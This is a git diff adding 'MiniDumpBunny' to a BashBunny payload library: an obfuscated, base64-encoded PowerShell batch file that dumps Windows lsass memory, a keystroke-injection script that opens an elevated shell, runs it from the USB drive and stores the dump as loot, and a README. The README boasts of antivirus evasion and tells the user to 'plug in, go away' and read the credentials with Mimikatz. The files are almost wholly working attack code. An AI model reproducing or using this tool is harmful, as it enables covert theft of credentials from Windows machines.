diff --git a/payloads/library/credentials/MiniDumpBunny/MiniBunny.bat b/payloads/library/credentials/MiniDumpBunny/MiniBunny.bat new file mode 100644 index 00000000..7e6ea1d9 --- /dev/null +++ b/payloads/library/credentials/MiniDumpBunny/MiniBunny.bat @@ -0,0 +1,2 @@ +ÿþ&cls +powershell.exe -enc JABwAHIAbwBjAGUAcwBzACAAPQAgAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAGwAcwBhAHMAcwA7ACgAbgBlAHcALQBPAGIASgBFAGMAVAAgACAASQBPAC4AQwBvAE0AUAByAGUAcwBzAGkAbwBuAC4ARABlAEYAbABhAHQAZQBzAFQAcgBFAEEATQAoAFsAUwB5AHMAVABlAE0ALgBpAG8ALgBtAEUATQBPAHIAeQBzAHQAcgBlAGEAbQBdAFsAcwBZAFMAVABFAE0ALgBjAG8ATgB2AEUAcgBUAF0AOgA6AEYAcgBPAG0AYgBhAFMARQA2ADQAUwBUAHIAaQBuAGcAKAAgACcAegBWAFYAUgBiADkAbwB3AEUASAA3AG4AVgA1AHcANgBKAEIASQBKAEkAbwAxAE8AZQA2AGgAVQBhAFIAMAB0AEcANQBPAGcARQBlAG0ARwBOAEkAUQBxAFEANAA3AEcAbQAyAE4ASABqAG8ARwBpAHEAdgA5ADkANQB5AFEAbABDAGEARQBQADYAMQA2AFcAcAAvAGoAOAArAGIAdgBQADUAOAA5AG4AQQBJAEQANQBJAEEANABGAG0AcwA5AGMAaABsAHcAKwBPAE8ANgBpAFIAVQBIAHcAbQBXAFkAeABPAEsAMQBXAE4AcgBMAGYAUABBAHUAaABRAGUAMwA0AEsAdQBXAEcASwB3AG0AWAA4AEwANwBBAFoANABnAGYAVABQAEMAUQBHAFEAeABXAG0AaQBmAEcAZQBZAEkANwBUAEUAMwBQAFoAeQBhAEMAOQBqADAAOABWADYARwBCADAAWgBTAHQARABMAFMAdgBOADMARQB5ADUAQQBJAHoAOQBDAFcAMAAvAGQAbAAxAE4AdQBtAFcAQwB0AHEAegBtAHkAbABOAHoAZgAzAGcAZAB2AGsATABWADIAYgBoAFgAYQBVAHAAeABrAHUAeAA5ADcANgBnAHUAZABzAG4ANgBIAFMAQwBmAFcAbwB3ADkAcwBaAE0AcwBnAGUATQBVAFIAcgB2AGEAbQBOAFUAegBLAHgAYwBiADAAWgA3AFYATAB2ADAAUgBtAHUAbABwADUAZwBvAGIAVQBoAEQAeAA2ADAAbABtAEIAQgAwAGkAMgBNADAAawBRAHAAVABLADQAUgBpAGwAbgA1AEMAVwA4AEUAdwBUADEATABEAGQATAByAFEAbQBTAGoAcABiADUAYQBDAHIANgBwAGsAUQA4AEUAZQBMAE0ATgA4AGkAbQB0AEIAYwBxADIAQwBvAHMAcgBaADEASwBLAHkAcgBnAHUAQgBJAGQASgBWAHAAMQB3ACsANQBwAEwAYgBvAHMAdwAwAE4AMgBoAC8AQwBqAEcAMQA1AEYAWgBaAC8AdQB0ADAARwBnAHQASQBXAFMANwBDAFAAYwBIAEsAVABUAFQAYwBDAEQASABHAFcATwBtADkAVgBmAGwAOQBKAE0AMQA1AGYAdwBIADkAUwBzAEYAOQByAFYAYQBZAHAAcQBNAHcATwA1AEYAOAA0AEkAMwBDAEIAbQBCAEMAeABxAGgAQwA3AEwAZwBCACsAcwBvAGsARwBhADAASwB5AHkATQBOAG8ATABWAEIAdwBYAGoAVwBkAHEAbwA1ADMAUAB0AHkAUABBAHAAZABMADQAeQBUAHMANgBaAGMAdQA3AC8AQwBSAHQAOABVAGwANABVAEIAYQB3AFkANwBUAGwAVQBoAHMAUwBGAHkASgA1AEwAOQBMADIARwBDAHUAMQA1AHUATgBoAGoAZABlAHUAVwBVAGMANQB5AHIAQwAvAE0AQwBNAEYAWQBoAEwAaQA0AHUAQgBnAFEAegBXAEgAWAB2AEYATgBPAE4ATQBIAGIALwBqAFoAUAB5AFIAbgBLAHIAZgBxAFAAVABsAG4AUQBrAFgAZgBqAGsAMQBHAHYAVwBQAFoARAA4ADEAVgBkAFcANgBxADAARQA1AFkAYQA5AGcASwAzAFIARAB2ADkATgAwAFcAbgA3AHYAWgBGAHQAVABvADcAMQBqAGEAWgBpAC8AMABTAHQALwBoADgAUwAxAHoAMQBwAEoAMgA4AGcAVgBJAHAATwBaAFoASwB2AHcAZQBsAEoAWgBWADYAOABVAGQANwBUAHAANQBxAE8AOQBzADMAagBDAHAATwBpADQAMQBZAHMATwBWAEIAeABvAGkAUQAxAE8AZQBzADUAWQBkAHYAYgBlAGYAOABBAGYAWQBWAGgAVABJAGEAZwAxAGwAagBjAHIAVQBQAFkASwArAEkAdQBPAEUAZABYADcAcQBKADIANQBkAHoASwBmAGIAUABmAE8ANQBqAFMARQBXADQAUgBtAE4AeABEAHcAcQBpAGoATQBpAEgAMgBzAEMATgBuAEcANQBRAFEAMgByADYAMQBwAGgASwBrAEgAZwB5AFYAQgBuAHgAawBjAFUATAAyAEEAZgBZAEMAegBpAEUANwBMAGcAUQBzADgAVwBYAGQAVQBRAG8AdQB3AFUAUQBJAEsANQBZAFMASQBpAEwAYQA4ADMANQB2AHkAUQAzADQAYQBvAGMANgBpAEoARABXADAAbgBPAEMASwBSAGkAVgAwAHoASAA0ACsAQwBGAEQASgBFAFcAbgBxAFIASABtAGkAbgBzAGoAZQBpAGkAYQBQAGEATwBYAHYAUQA1AFgAVwBiAHUARwBnAEoAUgBMAEkALwBZAEQASgBlAG0AcAAyAEcAQgA5ADcAeQBiAFMAYQB0AGMAcwA3AFEASAB6AGYAUABoAEQAawBlAEkAcgBaADAAcwBOAHYARABlAEkAdQBBAGgAUAB5AHEAbAB3AHQAZgA0AEEAJwAgACkAIAAsAFsAcwB5AFMAdABlAG0ALgBJAE8ALgBDAE8AbQBQAFIAZQBTAFMAaQBPAG4ALgBjAG8AbQBwAHIARQBTAFMAaQBPAE4ATQBvAEQARQBdADoAOgBEAGUAQwBPAE0AcAByAGUAcwBTACAAKQB8ACAAZgBPAFIARQBhAGMAaAAgAHsAIABuAGUAdwAtAE8AYgBKAEUAYwBUACAAIABJAG8ALgBzAFQAUgBlAEEATQBSAGUAQQBkAGUAUgAoACQAXwAgACwAWwBzAHkAUwBUAGUAbQAuAHQARQB4AFQALgBlAG4AQwBvAEQASQBuAGcAXQA6ADoAYQBTAEMASQBJACAAKQAgAH0AKQAuAFIARQBBAEQAdABvAEUAbgBkACgAIAApAHwAaQBuAHYAbwBLAEUALQBlAHgAcABSAEUAUwBTAGkAbwBOAA== \ No newline at end of file diff --git a/payloads/library/credentials/MiniDumpBunny/README.md b/payloads/library/credentials/MiniDumpBunny/README.md new file mode 100644 index 00000000..a6fba8e0 --- /dev/null +++ b/payloads/library/credentials/MiniDumpBunny/README.md @@ -0,0 +1,17 @@ +**Title: MiniDumpBunny** + +Author: 0iphor13 + +Version: 1.0 + +What is MiniDumpBunny? +# +*MiniDumpBunny uses Powersploits Out-MiniDump script to dump lsass. The script was rewritten, adapted for BashBunny usage and obfuscated in multiple ways to evade Antivirus.* +# + +**Instruction:** + +Plug in your BashBunny equipped with the obfuscated MiniBunny.bat file, wait a few seconds, go away. +# +Exfiltrate the .dmp file and read it with Mimikatz. +![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/MiniDumpBunny/mimi.png) \ No newline at end of file diff --git a/payloads/library/credentials/MiniDumpBunny/mimi.png b/payloads/library/credentials/MiniDumpBunny/mimi.png new file mode 100644 index 00000000..e366dd64 Binary files /dev/null and b/payloads/library/credentials/MiniDumpBunny/mimi.png differ diff --git a/payloads/library/credentials/MiniDumpBunny/payload.txt b/payloads/library/credentials/MiniDumpBunny/payload.txt new file mode 100644 index 00000000..2fc58a03 --- /dev/null +++ b/payloads/library/credentials/MiniDumpBunny/payload.txt @@ -0,0 +1,43 @@ +#!/bin/bash +# +# Title: MiniDumpBunny +# Description: Dump lsass with this script, which was obfuscated with multiple layers. +# Author: 0iphor13 +# Version: 1.0 +# Category: Credentials +# Attackmodes: HID, Storage + +LED SETUP + +Q DELAY 500 + +GET SWITCH_POSITION +DUCKY_LANG de + +Q DELAY 500 + +ATTACKMODE HID STORAGE + +#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING + +LED STAGE1 + +Q DELAY 1000 +RUN WIN "powershell Start-Process powershell -Verb runAs" +Q ENTER +Q DELAY 1000 +Q ALT j +Q DELAY 250 + +Q DELAY 250 +Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\MiniBunny.bat')" +Q DELAY 250 +Q STRING " ;mv *.dmp ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l" +Q DELAY 250 +Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';(New-Object -comObject Shell.Application).Nam" +Q DELAY 250 +Q STRING "espace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit" +Q DELAY 300 +Q ENTER + +LED FINISH \ No newline at end of file